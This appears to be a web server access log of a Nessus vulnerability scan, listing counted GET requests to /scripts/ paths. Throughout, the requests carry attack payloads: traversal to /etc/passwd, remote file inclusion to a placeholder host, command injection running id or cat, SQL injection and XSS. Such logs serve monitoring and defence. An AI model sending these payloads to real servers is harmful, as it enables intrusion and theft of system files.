1 GET /scripts/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
1 GET /scripts/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/landesk/vboot/default.winpemanaged HTTP/1.1
1 GET /scripts/lang/index.php?file=/etc/passwd HTTP/1.1
1 GET /scripts/lang/lang.php?lang_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/language.php?data_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/lg.php HTTP/1.1
1 GET /scripts/lib.inc.php?pm_path=http[:]//example[.]com&sfx=.txt HTTP/1.1
1 GET /scripts/lib/OWL_API.php?xrms_file_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/lib/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /scripts/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /scripts/lib/authform.inc.php?path_pre=/etc/passwd%00 HTTP/1.1
1 GET /scripts/lib/dbman_filter.inc.php?lib_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/lib/specialdays.php?path_pre=/etc/passwd%00 HTTP/1.1
1 GET /scripts/lib/version.phps HTTP/1.1
1 GET /scripts/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/library/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /scripts/library/lib.php?root=http[:]//example[.]com HTTP/1.1
1 GET /scripts/list.php HTTP/1.1
1 GET /scripts/listinfo/ HTTP/1.1
1 GET /scripts/listing.php HTTP/1.1
1 GET /scripts/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
1 GET /scripts/livre_include.php?no_connect=lol&chem_absolu=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/loader-wizard.php?page=default HTTP/1.1
1 GET /scripts/loadpage.cgi HTTP/1.1
1 GET /scripts/logbook.pl?file=../../../../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
1 GET /scripts/logicworks.ini HTTP/1.1
1 GET /scripts/login.action HTTP/1.1
1 GET /scripts/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
2 GET /scripts/login.cgi HTTP/1.1
1 GET /scripts/login.jsp?lang=en&cntry= HTTP/1.1
1 GET /scripts/login.jsp HTTP/1.1
1 GET /scripts/login.mako HTTP/1.1
1 GET /scripts/login.php?course=\">%3cscript%3ealert%28atutor_xss.nasl%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd%00.txt HTTP/1.1
1 GET /scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1717627927')</script> HTTP/1.1
1 GET /scripts/login.php?url=editgedcoms.php HTTP/1.1
15 GET /scripts/login.php HTTP/1.1
1 GET /scripts/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem%28id%29&action=logout HTTP/1.1
1 GET /scripts/login.pl HTTP/1.1
1 GET /scripts/login.wdm HTTP/1.1
1 GET /scripts/login/default.aspx HTTP/1.1
5 GET /scripts/login HTTP/1.1
1 GET /scripts/logs/HCDiskQuotaService.csv HTTP/1.1
1 GET /scripts/lostpass.php HTTP/1.1
2 GET /scripts/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ HTTP/1.1
1 GET /scripts/lp/AdminlogonPoint/Logon.do HTTP/1.1
1 GET /scripts/lp HTTP/1.1
1 GET /scripts/lsg2.cgi HTTP/1.1
1 GET /scripts/m0bot1qj.asp?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.asp?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.aspx?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.aspx?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.cfc?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.cfc?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.cfm?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.cfm?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.cgi?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.cgi?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.dll?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.dll?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.do?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.do?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.exe?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.exe?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.fts?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.fts?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.htm?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.htm?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.html?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.html?<script>cross_site_scripting.nasl</script> HTTP/1.1
13 GET /scripts/m0bot1qj.html HTTP/1.1
1 GET /scripts/m0bot1qj.idc?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.idc?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.jsp?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.jsp?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.jspa?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.jspa?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.kspx?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.kspx?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.mscgi?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.mscgi?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.nsf?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.nsf?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.php3?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.php3?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.php?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.php?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.pl?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.pl?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/m0bot1qj.x?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /scripts/m0bot1qj.x?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /scripts/mail.cgi HTTP/1.1
1 GET /scripts/mail.php?id='/**/UNION/**/SELECT/**/1,2,1717627963,4--&blog=1 HTTP/1.1
1 GET /scripts/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
3 GET /scripts/main.php HTTP/1.1
1 GET /scripts/man-cgi?-P%20id%20ls HTTP/1.1
1 GET /scripts/man-cgi?section=0&topic=ls%3bid HTTP/1.1
1 GET /scripts/man2html?section=-P%20id&topic=w HTTP/1.1
1 GET /scripts/man2web?program=-P%20id%20ls HTTP/1.1
1 GET /scripts/manager/ HTTP/1.1
1 GET /scripts/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/mapserv.exe?map=mapserver_detect.nasl.map HTTP/1.1
1 GET /scripts/mapserv?map=mapserver_detect.nasl.map HTTP/1.1
1 GET /scripts/math_sum.mscgi HTTP/1.1
1 GET /scripts/mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /scripts/mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24%28ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1717627947%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F%5d%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20%27s%2f.%2advips.ps%20%2f%2f%27%20-e%20%27s%2fgif%20%3econvert.%2a%2fgif%2fp%27%20%7c%20tee%20%2ftmp%2ffoo4%29%20%7c%20echo%20mathtex_dpi_exec.nasl-1717627947%20} HTTP/1.1
1 GET /scripts/member.php?action=login HTTP/1.1
1 GET /scripts/member/index.php HTTP/1.1
1 GET /scripts/mensajeitor.php HTTP/1.1
1 GET /scripts/menu_dx.php?SITE_Path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/minis.php?month=../../../../../../etc/passwd HTTP/1.1
2 GET /scripts/misc.php?action=login HTTP/1.1
1 GET /scripts/misc/audio.php?recording=../version.inc HTTP/1.1
1 GET /scripts/misc/drupal.js HTTP/1.1
1 GET /scripts/misc/info.php HTTP/1.1
1 GET /scripts/mj_wwwusr HTTP/1.1
1 GET /scripts/mlog.html?screen=/etc/passwd HTTP/1.1
1 GET /scripts/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20\"Content-Type:%20text%2Fhtml\"%3Becho%20\"\"%20%3B%20id%00 HTTP/1.1
1 GET /scripts/moadmin.php HTTP/1.1
1 GET /scripts/module.php?module=osTicket&file=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/module.php?module=osTicket&file=/modules/osTicket/admin.php HTTP/1.1
1 GET /scripts/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
1 GET /scripts/modules.php?name=My_eGallery HTTP/1.1
1 GET /scripts/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
1 GET /scripts/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1717627961,1,115221283-- HTTP/1.1
1 GET /scripts/modules/core/module.inc HTTP/1.1
1 GET /scripts/modules/news/ HTTP/1.1
1 GET /scripts/modules/phpRPC/server.php HTTP/1.1
1 GET /scripts/modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /scripts/month.php HTTP/1.1
1 GET /scripts/more.php?id=1' HTTP/1.1
1 GET /scripts/mpweb/html/help/000/user_help/help/output/config.js HTTP/1.1
1 GET /scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /scripts/msg.txt HTTP/1.1
1 GET /scripts/mt.cgi?__mode=logout HTTP/1.1
1 GET /scripts/mw-config HTTP/1.1
1 GET /scripts/myevent.php?myevent_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/mylog.html?screen=/etc/passwd HTTP/1.1
1 GET /scripts/myphpPageTool/doc/admin/index.php?ptinclude-http[:]//example[.]com HTTP/1.1
1 GET /scripts/nbmember.cgi?cmd=test HTTP/1.1
1 GET /scripts/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
1 GET /scripts/ncbook/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
1 GET /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=bBTfMG1ZzOyP5IuLY HTTP/1.1
1 GET /scripts/neomail.pl HTTP/1.1
1 GET /scripts/nessus%22%3e%3cscript%3ealert%28%27django_admin_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /scripts/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script> HTTP/1.1
1 GET /scripts/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/netcmd.php?cmd=whois&query=|id HTTP/1.1
1 GET /scripts/new-visitor.inc.php?lvc_include_dir=http[:]//example[.]com HTTP/1.1
1 GET /scripts/new_images.php?order=linpha_order_sql_injection.nasl_1717627950 HTTP/1.1
1 GET /scripts/news.mdb HTTP/1.1
1 GET /scripts/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl HTTP/1.1
1 GET /scripts/news.php HTTP/1.1
1 GET /scripts/news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
1 GET /scripts/newsdata/data/user.idx HTTP/1.1
1 GET /scripts/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/newsscript.pl?mode=admin HTTP/1.1
1 GET /scripts/nmap.php?target=|id HTTP/1.1
1 GET /scripts/normal_html.cgi?file=|id| HTTP/1.1
1 GET /scripts/notify?from=nessus\"|id\" HTTP/1.1
1 GET /scripts/nph-exploitscanget.cgi?host=id&port=80&errchk=0&idsbypass=0 HTTP/1.1
1 GET /scripts/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/nph-mr.cgi HTTP/1.1
1 GET /scripts/nph-proxy.cgi HTTP/1.1
1 GET /scripts/nph-test-cgi?* HTTP/1.0
2 GET /scripts/nquser.php HTTP/1.1
1 GET /scripts/nslookup.cgi?query=localhost%3bid&type=ANY&ns= HTTP/1.1
1 GET /scripts/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/nx/common/cds/menu.inc.php?c_path=http[:]//example[.]com/ HTTP/1.1
1 GET /scripts/ohelp/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
1 GET /scripts/op/op.Login.php?login=guest&sesstheme=default&lang=English HTTP/1.1
1 GET /scripts/open.php HTTP/1.1
1 GET /scripts/openwebmail.pl HTTP/1.1
1 GET /scripts/ovlaunch.exe HTTP/1.1
1 GET /scripts/p-news.php HTTP/1.1
1 GET /scripts/pafiledb.php HTTP/1.1
1 GET /scripts/page?view=about HTTP/1.1
1 GET /scripts/pajax/pajax_call_dispatcher.php HTTP/1.1
1 GET /scripts/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
1 GET /scripts/parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
1 GET /scripts/password_reminder.php HTTP/1.1
1 GET /scripts/patch/index.php HTTP/1.1
1 GET /scripts/perl.exe?-v HTTP/1.1
1 GET /scripts/perl?-v HTTP/1.1
1 GET /scripts/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/pfdispaly?../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
1 GET /scripts/photo.php?albumid=-144'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
1 GET /scripts/php-ping.php?host=test&submit=Ping!&count=1|id|| HTTP/1.1
1 GET /scripts/php.cgi?/etc/passwd HTTP/1.1
2 GET /scripts/php/mytutos.php HTTP/1.1
1 GET /scripts/phpnews/sendtofriend.php?mid='1' HTTP/1.1
1 GET /scripts/phpping/index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
1 GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
1 GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../vtigerservice.php%00 HTTP/1.1
1 GET /scripts/phptonuke.php?filnavn=/etc/passwd HTTP/1.1
1 GET /scripts/plog-download.php?dl_type=album&checked[]=%27%20UNION%20SELECT%20%27plogger_checked_sql_injection.nasl%27%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%20--%20 HTTP/1.1
1 GET /scripts/plog-rss.php?level=collection&id=999%20OR%20plogger_id_sql_injection.nasl HTTP/1.1
1 GET /scripts/plugins/image2/plugin.js HTTP/1.1
1 GET /scripts/plugins/preview/preview.html HTTP/1.1
1 GET /scripts/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/plugins/safehtml/safehtml.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http[:]//example[.]com/&sfx=.txt HTTP/1.1
1 GET /scripts/pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
1 GET /scripts/pmwiki.php HTTP/1.1
1 GET /scripts/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/popup.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/port.php?proto=tcp' HTTP/1.1
1 GET /scripts/portal/ HTTP/1.1
1 GET /scripts/preferences.php?action=setcookie HTTP/1.1
1 GET /scripts/print.php?what=article&id=' HTTP/1.1
1 GET /scripts/printfaq.php?lng=en&pg=1 HTTP/1.1
1 GET /scripts/processSimple.do HTTP/1.1
1 GET /scripts/profil.php?id=1%20<script>foo</script> HTTP/1.1
1 GET /scripts/projects_site/uploadfile.php?demoSession=1 HTTP/1.1
1 GET /scripts/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
1 GET /scripts/proxy.php?url=%3cscript%3ealert%28%27clarkconnect_url_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/psunami.cgi?file=|id| HTTP/1.1
1 GET /scripts/public/index.php?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /scripts/public/index.php?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /scripts/pwcgi/smpwservicescgi.exe?TARGET=http[:]//www[.]example[.]com HTTP/1.1
1 GET /scripts/query.cgi HTTP/1.1
1 GET /scripts/query?group=-- HTTP/1.1
1 GET /scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1
1 GET /scripts/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
1 GET /scripts/ray/modules/global/inc/content.inc.php?sIncPath=/etc/passwd%00 HTTP/1.1
1 GET /scripts/recordings/index.php HTTP/1.1
1 GET /scripts/remindpasswd HTTP/1.1
1 GET /scripts/remotehtmlview.php?phpAds_path=http[:]//example[.]com HTTP/1.1
1 GET /scripts/reports/rwservlet HTTP/1.1
1 GET /scripts/resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/rest/api/2.0.alpha1/serverInfo HTTP/1.1
1 GET /scripts/rest/api/2/serverInfo HTTP/1.1
1 GET /scripts/review.php?id=1&cat=&subcat=%22%3E%3cscript%3ealert%28%27phpmydirectory_multiple_xss.nasl%27%29%3b%3c%2fscript%3e HTTP/1.1
1 GET /scripts/roschedule.php HTTP/1.1
1 GET /scripts/rot13sj.cgi?/etc/passwd HTTP/1.1
1 GET /scripts/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
1 GET /scripts/rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
2 GET /scripts/s_form.cgi HTTP/1.1
1 GET /scripts/samba/smb2www.pl HTTP/1.1
1 GET /scripts/samples/sample_posteddata.php HTTP/1.1
1 GET /scripts/save.php?file_save=/etc/passwd HTTP/1.1
1 GET /scripts/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
1 GET /scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
1 GET /scripts/sdbsearch.cgi?stichwort=anything HTTP/1.1
1 GET /scripts/search.aspx HTTP/1.1
1 GET /scripts/search.cfm HTTP/1.1
1 GET /scripts/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /scripts/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
2 GET /scripts/search.cgi HTTP/1.1
1 GET /scripts/search.exe HTTP/1.1
1 GET /scripts/search.jsp?q=%25%22%3cscript%3ealert(1717627921)%3c/script%3e HTTP/1.1
1 GET /scripts/search.php?Submit=true&search='); HTTP/1.1
1 GET /scripts/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
3 GET /scripts/search.php HTTP/1.1
1 GET /scripts/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/search.pl HTTP/1.1
1 GET /scripts/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=Folder%20name HTTP/1.1
1 GET /scripts/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
1 GET /scripts/search/show.pl?url=file:/etc/passwd HTTP/1.1
1 GET /scripts/search/show.pl?url=http[:]//www[.]google[.]com HTTP/1.1
1 GET /scripts/search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
1 GET /scripts/search HTTP/1.1
1 GET /scripts/secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
1 GET /scripts/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
1 GET /scripts/server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
1 GET /scripts/server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert%28%27plumtree_name_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/server/s3_download.php HTTP/1.1
2 GET /scripts/services/Walrus HTTP/1.1
1 GET /scripts/services/help/?module=horde&show=about HTTP/1.1
1 GET /scripts/services/help/?module=horde&show=menu HTTP/1.1
1 GET /scripts/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20 HTTP/1.1
1 GET /scripts/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
1 GET /scripts/settings/site.ini HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1
1 GET /scripts/sgdynamo.exe?HTNAME=<script>foo</script> HTTP/1.1
1 GET /scripts/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
1 GET /scripts/shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/shell/sitecore.version.xml HTTP/1.1
1 GET /scripts/shop.plx/page=nessus149271294 HTTP/1.1
1 GET /scripts/shop.plx HTTP/1.1
1 GET /scripts/shopaddtocart.asp?productid='42 HTTP/1.1
1 GET /scripts/shopexd.asp?catalogid='42 HTTP/1.1
1 GET /scripts/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/shoutbox.php?conf=../ HTTP/1.1
1 GET /scripts/showcat.php?cat=1' HTTP/1.1
1 GET /scripts/showproduct.php?product=1' HTTP/1.1
1 GET /scripts/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
1 GET /scripts/siteframe.php?LOCAL_PATH=/etc/passwd%00 HTTP/1.1
1 GET /scripts/siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
1 GET /scripts/sitemap.xml HTTP/1.1
1 GET /scripts/smb2www.pl HTTP/1.1
1 GET /scripts/smpwservicescgi.exe HTTP/1.1
1 GET /scripts/snpfiltered.pl?t=c&u=<script>foo</script> HTTP/1.1
1 GET /scripts/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
1 GET /scripts/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /scripts/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /scripts/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /scripts/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /scripts/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /scripts/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
1 GET /scripts/src/login.php HTTP/1.1
1 GET /scripts/src/redirect.php HTTP/1.1
1 GET /scripts/starnet/addons/slideshow_full.php?album_name=%27859156484 HTTP/1.1
1 GET /scripts/starnet/modules/include/include.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/starnet/themes/editable/main.inc.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /scripts/start.action HTTP/1.1
1 GET /scripts/status.php3 HTTP/1.1
1 GET /scripts/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /scripts/store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
1 GET /scripts/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/styles.php?toroot=/etc/passwd%00 HTTP/1.1
1 GET /scripts/subsystems/permissions.info.php HTTP/1.1
1 GET /scripts/sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/superguestconfig HTTP/1.1
1 GET /scripts/support.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert%28%22cerberus_support_center_mult_flaws.nasl%22%29%3c%2fscript%3e HTTP/1.1
1 GET /scripts/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
1 GET /scripts/surgeweb?username_ex=\"><scri<script>alert(42);</script><input type=\"hidden
1 GET /scripts/survey.inc.php?path=/etc/passwd%00 HTTP/1.1
